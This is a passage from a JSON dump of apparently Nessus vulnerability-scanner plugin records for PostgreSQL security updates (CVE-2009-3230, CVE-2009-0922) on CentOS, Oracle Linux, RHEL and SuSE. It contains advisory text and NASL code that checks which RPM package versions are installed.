(rpm_check(release:\"CentOS-5\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-libs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-debuginfo / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:44:45", "description": "From Red Hat Security Advisory 2009:1484 :\n\nUpdated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : postgresql (ELSA-2009-1484)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:postgresql-pl", "p-cpe:/a:oracle:linux:postgresql-tcl", "p-cpe:/a:oracle:linux:postgresql-contrib", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:postgresql-docs", "p-cpe:/a:oracle:linux:postgresql", "p-cpe:/a:oracle:linux:postgresql-test", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:postgresql-devel", "p-cpe:/a:oracle:linux:postgresql-server", "p-cpe:/a:oracle:linux:postgresql-jdbc", "p-cpe:/a:oracle:linux:postgresql-python", "p-cpe:/a:oracle:linux:postgresql-libs"], "id": "ORACLELINUX_ELSA-2009-1484.NASL", "href": "https://www.tenable.com/plugins/nessus/67936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1484 and \n# Oracle Linux Security Advisory ELSA-2009-1484 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67936);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6600\", \"CVE-2009-0922\", \"CVE-2009-3230\");\n script_bugtraq_id(34090, 36314);\n script_xref(name:\"RHSA\", value:\"2009:1484\");\n\n script_name(english:\"Oracle Linux 4 / 5 : postgresql (ELSA-2009-1484)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1484 :\n\nUpdated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-October/001186.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-October/001187.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postgresql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-contrib-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-devel-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-docs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-jdbc-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-libs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-pl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-python-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-server-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-tcl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postgresql-test-7.4.26-1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-devel-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-libs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:07:06", "description": "Updated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "edition": 26, "published": "2009-10-08T00:00:00", "title": "RHEL 4 / 5 : postgresql (RHSA-2009:1484)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "modified": "2009-10-08T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:postgresql-devel", "p-cpe:/a:redhat:enterprise_linux:postgresql-pl", "p-cpe:/a:redhat:enterprise_linux:postgresql-docs", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:postgresql-tcl", "p-cpe:/a:redhat:enterprise_linux:postgresql", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:postgresql-jdbc", "p-cpe:/a:redhat:enterprise_linux:postgresql-server", "p-cpe:/a:redhat:enterprise_linux:postgresql-python", "p-cpe:/a:redhat:enterprise_linux:postgresql-test", "p-cpe:/a:redhat:enterprise_linux:postgresql-contrib", "p-cpe:/a:redhat:enterprise_linux:postgresql-libs"], "id": "REDHAT-RHSA-2009-1484.NASL", "href": "https://www.tenable.com/plugins/nessus/42064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1484. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42064);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6600\", \"CVE-2009-0922\", \"CVE-2009-3230\");\n script_bugtraq_id(34090, 36314);\n script_xref(name:\"RHSA\", value:\"2009:1484\");\n\n script_name(english:\"RHEL 4 / 5 : postgresql (RHSA-2009:1484)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1484\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1484\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-contrib-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-devel-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-docs-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-jdbc-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-libs-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-pl-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-python-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-server-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-tcl-7.4.26-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postgresql-test-7.4.26-1.el4_8.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"postgresql-devel-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"postgresql-libs-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n }\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:20", "description": "Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)", "edition": 23, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : PostgreSQL (YOU Patch Number 12383)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0922"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12383.NASL", "href": "https://www.tenable.com/plugins/nessus/41288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41288);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0922\");\n\n script_name(english:\"SuSE9 Security Update : PostgreSQL (YOU Patch Number 12383)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Remote authenticated users could crash the postgresql server by\nrequesting a conversion with an inappropriate encoding.\n(CVE-2009-0922)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0922.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12383.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network 